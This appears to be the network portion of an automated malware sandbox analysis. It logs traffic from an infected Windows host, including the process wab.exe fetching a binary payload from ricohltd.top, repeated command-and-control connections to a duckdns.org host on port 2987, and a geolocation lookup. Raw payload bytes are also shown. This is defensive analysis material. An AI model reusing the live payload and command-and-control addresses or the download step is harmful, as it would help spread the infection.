                                                          Apr 24, 2024 07:13:21.802812099 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802819967 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.802908897 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802958965 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.802977085 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803041935 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803090096 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803107977 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803148031 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803189039 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803200960 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803260088 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803297997 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803307056 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803356886 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803404093 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803406000 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803472042 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803515911 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803525925 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803608894 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803663015 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803663015 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803724051 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803776026 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803802967 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803859949 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803910017 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.803913116 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.803972960 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804020882 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.804047108 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804086924 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804141998 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.804171085 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804217100 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804264069 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.804284096 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804322004 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804364920 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.804379940 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804434061 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804482937 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.804486990 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804541111 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804589033 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.804610968 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804649115 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804686069 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804691076 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.804723978 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.804765940 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.102722883 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.102844954 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.102884054 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.102901936 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.102940083 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.102982998 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.102996111 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103055000 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103096962 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103110075 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103167057 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103209019 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103221893 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103260040 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103297949 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103317022 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103374004 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103419065 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103429079 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103466988 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103522062 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103524923 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103579044 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103616953 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103626013 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103677988 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103722095 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103840113 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103888988 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103934050 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.103946924 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.103985071 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104028940 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.104043961 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104187012 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104237080 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.104254961 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104294062 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104341984 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.104356050 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104429007 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104474068 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.104501009 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104540110 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104577065 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:22.104585886 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:22.147903919 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:23.943320036 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:24.242907047 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:24.242925882 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:24.243108988 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:24.243172884 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:24.243257046 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:24.243302107 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:24.546278000 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:24.577111006 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:24.577234983 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:25.027153969 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:25.029620886 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:36.213520050 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:36.217880011 CEST4971329871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:36.573879004 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:14:07.013395071 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:14:07.015937090 CEST4971329871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:14:07.370501041 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:14:37.945065022 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:14:37.946700096 CEST4971329871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:14:38.307908058 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:15:01.929956913 CEST4971580192.168.2.9178.237.33.50
                                                          Apr 24, 2024 07:15:02.694789886 CEST4971580192.168.2.9178.237.33.50
                                                          Apr 24, 2024 07:15:04.304163933 CEST4971580192.168.2.9178.237.33.50
                                                          Apr 24, 2024 07:15:07.491843939 CEST4971580192.168.2.9178.237.33.50
                                                          Apr 24, 2024 07:15:08.767678022 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:15:08.769452095 CEST4971329871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:15:09.120156050 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:15:13.601028919 CEST4971580192.168.2.9178.237.33.50
                                                          Apr 24, 2024 07:15:25.804239035 CEST4971580192.168.2.9178.237.33.50
                                                          Apr 24, 2024 07:15:39.581439018 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:15:39.587440014 CEST4971329871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:15:39.948352098 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:15:50.007303953 CEST4971580192.168.2.9178.237.33.50
                                                          Apr 24, 2024 07:16:10.090158939 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:16:10.096414089 CEST4971329871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:16:10.449846983 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:16:40.833359003 CEST2987149713193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:16:40.838202000 CEST4971329871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:16:41.198183060 CEST2987149713193.222.96.21192.168.2.9
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 24, 2024 07:13:11.935368061 CEST5169053192.168.2.91.1.1.1
                                                          Apr 24, 2024 07:13:12.397959948 CEST53516901.1.1.1192.168.2.9
                                                          Apr 24, 2024 07:13:16.998541117 CEST6044453192.168.2.91.1.1.1
                                                          Apr 24, 2024 07:13:18.007380009 CEST6044453192.168.2.91.1.1.1
                                                          Apr 24, 2024 07:13:18.409533978 CEST53604441.1.1.1192.168.2.9
                                                          Apr 24, 2024 07:13:18.409550905 CEST53604441.1.1.1192.168.2.9
                                                          Apr 24, 2024 07:13:19.376108885 CEST6104853192.168.2.91.1.1.1
                                                          Apr 24, 2024 07:13:19.531780005 CEST53610481.1.1.1192.168.2.9
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Apr 24, 2024 07:13:11.935368061 CEST192.168.2.91.1.1.10x7556Standard query (0)ricohltd.topA (IP address)IN (0x0001)false
                                                          Apr 24, 2024 07:13:16.998541117 CEST192.168.2.91.1.1.10xf9e3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                                          Apr 24, 2024 07:13:18.007380009 CEST192.168.2.91.1.1.10xf9e3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                                          Apr 24, 2024 07:13:19.376108885 CEST192.168.2.91.1.1.10xdd7Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Apr 24, 2024 07:13:12.397959948 CEST1.1.1.1192.168.2.90x7556No error (0)ricohltd.top104.21.60.38A (IP address)IN (0x0001)false
                                                          Apr 24, 2024 07:13:12.397959948 CEST1.1.1.1192.168.2.90x7556No error (0)ricohltd.top172.67.191.112A (IP address)IN (0x0001)false
                                                          Apr 24, 2024 07:13:18.409533978 CEST1.1.1.1192.168.2.90xf9e3No error (0)learfo55ozj01.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                          Apr 24, 2024 07:13:18.409550905 CEST1.1.1.1192.168.2.90xf9e3No error (0)learfo55ozj01.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                          Apr 24, 2024 07:13:19.531780005 CEST1.1.1.1192.168.2.90xdd7No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                          • ricohltd.top
                                                          • geoplugin.net
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949715178.237.33.50807500C:\Program Files (x86)\Windows Mail\wab.exe
                                                          TimestampBytes transferredDirectionData
                                                          Apr 24, 2024 07:13:19.837264061 CEST71OUTGET /json.gp HTTP/1.1
                                                          Host: geoplugin.net
                                                          Cache-Control: no-cache
                                                          Apr 24, 2024 07:13:20.147896051 CEST1173INHTTP/1.1 200 OK
                                                          date: Wed, 24 Apr 2024 05:13:19 GMT
                                                          server: Apache
                                                          content-length: 965
                                                          content-type: application/json; charset=utf-8
                                                          cache-control: public, max-age=300
                                                          access-control-allow-origin: *
                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                          Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949712104.21.60.384437500C:\Program Files (x86)\Windows Mail\wab.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-04-24 05:13:12 UTC173OUTGET /aCqwFQDQz144.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                          Host: ricohltd.top
                                                          Cache-Control: no-cache
                                                          2024-04-24 05:13:13 UTC842INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Apr 2024 05:13:13 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 494656
                                                          Connection: close
                                                          Last-Modified: Mon, 15 Apr 2024 18:39:36 GMT
                                                          ETag: "661d7468-78c40"
                                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                          Cache-Control: max-age=315360000
                                                          CF-Cache-Status: HIT
                                                          Age: 4940
                                                          Accept-Ranges: bytes
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBxofDnxx9TQFyN9S0z8jrXclyO5%2BIEsv3Id6yjHqV8VC4%2Fbk45Qzs5Fxx1%2BLSUFYTRJPiCSL%2BjjeC8sXyJv2lV2s8RSVMfqjM7vdeUVQ9RedR9pj6VEz2vhH6%2FITPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                          X-Content-Type-Options: nosniff
                                                          Server: cloudflare
                                                          CF-RAY: 87939a509a3c7c49-LAX
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-04-24 05:13:13 UTC527INData Raw: 03 a6 a8 e2 1f 9d 3d 79 f2 7f 54 c4 c6 ff a6 de ec 0d 2d ae 32 50 df bc d0 75 ae 2d c7 b4 bb bd 22 37 1d 29 cb e3 35 ab de f7 e7 2f 85 26 68 6c d2 bc a0 9c b3 09 3c 8f dc 6f cf fd 14 29 5a 5b 44 19 f7 89 e3 a0 9f 9a df 2e 88 fe 05 9c a2 dd 9e 65 67 14 01 b3 d8 66 e3 30 76 58 7e 37 e3 53 8d 4c 81 a6 54 b9 60 e1 cc 35 ab 0b 41 2f c5 8e 71 9d 7c cd 35 68 ac 42 c8 99 ce 98 ac 4e 2f b7 7c d1 3c 86 d6 92 0b 66 28 0d 47 04 bf 78 ee 80 3c 87 bb 79 05 cf 6b 7f 06 2d fb 6d 0d cf 2a b3 a4 04 9f 13 96 a9 11 fe ff 09 95 41 cf aa f8 15 2e 5e 98 38 c8 97 72 e4 19 45 30 47 c5 72 47 cf 0b c5 9d 7e aa f1 8f 7c 1e c6 b6 69 0f 08 43 4a a6 cb 14 44 89 3e 32 f5 89 37 a1 70 a3 1c 6c b9 06 13 f5 ea d3 4d 6d 26 b4 22 1c da 2c f1 36 40 88 2d ad 53 14 e5 50 7b b2 76 e8 7f 5b 61 b0
                                                          Data Ascii: =yT-2Pu-"7)5/&hl<o)Z[D.egf0vX~7SLT`5A/q|5hBN/|<f(Gx<yk-m*A.^8rE0GrG~|iCJD>27plMm&",6@-SP{v[a
                                                          2024-04-24 05:13:13 UTC1369INData Raw: e4 12 db 4f 7b 44 d1 b3 da 6b bb f1 36 00 88 0c 0e c2 3e b6 3e 8a 7e 31 f5 f4 85 2a 8b fe cd b2 75 2f f0 14 4a dc ad 1c 3f 2a ed e9 de a8 1f 40 2f c8 4f 47 97 71 dc 5d f3 f3 a0 69 23 e4 bd 82 2a 19 b7 08 92 b8 48 1d a3 65 94 93 bd fb 55 a4 36 12 8b 31 1c c8 4b 6b f5 ed 25 3f c8 02 3c 35 27 1c d1 e9 4a 2c 4d bd 85 02 9e 6b b5 9a c8 44 38 a9 38 6d 4d c9 9e 3d 5a 9e f4 3b c6 b0 1a 2d e4 f2 ab f5 b2 8a a8 6c 5c e6 5c 65 ce 4e 7b bd c2 6e ef 44 2b ac a4 8d 6d 6c c8 ce 87 4a cf 1d 41 11 c7 cc 9f 5c 99 d0 61 54 c0 2b 17 c0 44 72 62 fc 3b 94 48 b1 bb 06 61 2b 68 64 35 fa fc 41 90 6c 80 4b 96 e9 c7 56 62 f5 86 a2 0a 55 fc 0b 46 27 88 04 ca ac a1 fe 7a 61 51 22 b0 e2 06 00 b3 4a 9a 19 19 cf dc f3 5d 88 0b b5 98 38 c0 e1 75 73 af 78 d0 d0 06 2d 40 e0 69 8b 02 11 91
                                                          Data Ascii: O{Dk6>>~1*u/J?*@/OGq]i#*HeU61Kk%?<5'J,MkD88mM=Z;-l\\eN{nD+mlJA\aT+Drb;Ha+hd5AlKVbUF'zaQ"J]8usx-@i
                                                          2024-04-24 05:13:13 UTC1369INData Raw: 39 ab 0b 29 b6 45 cb 71 75 47 f9 36 68 f5 81 71 79 9a df a4 a7 b1 ba 72 ce ee 2b 56 63 02 43 2c 81 45 48 2b 9a 03 90 00 b3 9b e1 ff ad 0c 0d 0f ed 5b 4b 6c 49 4b e8 d3 24 a4 b5 dc db dd 68 8b 27 fb 89 03 d6 ab 35 2b 86 7c 18 e6 72 88 dd 3e 45 69 84 af 72 fe 57 3a 19 26 bb fa 38 5a 02 56 fd e3 52 2f 1a 49 07 31 ad 69 f9 03 dc b1 cc 1d b9 c5 03 24 e6 d1 0c 12 30 d2 7c 24 84 bb 58 c4 63 a4 cb 36 0a e3 54 36 ce 8f 7b 71 1f 6d 38 0c d2 3e 68 b4 1b 20 8c 03 86 7b 04 19 fc b3 35 cb 84 7d 1e 26 f6 af 2d d6 b0 f1 76 c5 6e 03 0b bf 83 2d a5 b1 f6 49 b7 c1 85 aa 94 07 25 19 db 0e 1f 78 1f 77 1e 68 b8 05 f1 8e be 38 dc 14 a1 c0 12 28 77 9b 8d 42 27 9d 6e ff c0 b2 1a 9a 5e fd 67 42 33 98 65 94 30 16 3a 56 63 ab 2d 31 f2 49 eb fd 45 d3 a8 f8 f2 4e cf 45 3c 08 95 ce e6
                                                          Data Ascii: 9)EquG6hqyr+VcC,EH+[KlIK$h'5+|r>EirW:&8ZVR/I1i$0|$Xc6T6{qm8>h {5}&-vn-I%xwh8(wB'n^gB3e0:Vc-1IENE<
                                                          2024-04-24 05:13:13 UTC1369INData Raw: 47 a8 7d 95 f7 9c dc 6f b0 5b a8 4a 9b 83 f9 8a b2 6e 31 27 9d 38 9c 30 33 ea 64 12 0c bb 7e a0 24 15 dc 9c cf 7f 6d 90 0f 10 ae 10 da a2 b1 8d 07 4e b1 2f fe e9 76 6a 5b 62 08 f6 cb 24 f7 c5 38 0e 41 af 17 a4 da 91 ab 48 de e1 f3 04 8a 0d 1f 24 44 52 8d d3 23 de aa 59 87 0e 32 1d 47 a5 ae 1c 81 df 26 24 f0 34 37 00 aa 81 b4 f2 74 de 66 81 b4 89 07 be df 02 36 55 db 32 13 46 a7 5a c7 3a 1f 0e f6 82 42 09 8e 79 eb 4f 79 ed 74 ea 07 1a bd 96 39 59 2e 9c 11 64 4c 8d d8 76 8f d8 39 33 44 1b 56 51 5d fb 6e 6e d7 e5 21 30 02 24 48 ca 57 93 df ef 78 ed f1 04 2e d4 d1 54 06 21 b9 e9 1c 21 69 78 6b 7b 1b 06 95 4b 5c fe a3 79 97 13 90 0f 39 aa e3 91 7a 61 94 81 75 e4 7b 68 a9 62 7d ed 69 84 40 a3 8e ac 1f 7e 03 6f b1 79 78 37 22 00 4f cb e2 d3 17 5f 39 6c 54 07 e5
                                                          Data Ascii: G}o[Jn1'803d~$mN/vj[b$8AH$DR#Y2G&$47tf6U2FZ:ByOyt9Y.dLv93DVQ]nn!0$HWx.T!!ixk{K\y9zau{hb}i@~oyx7"O_9lT
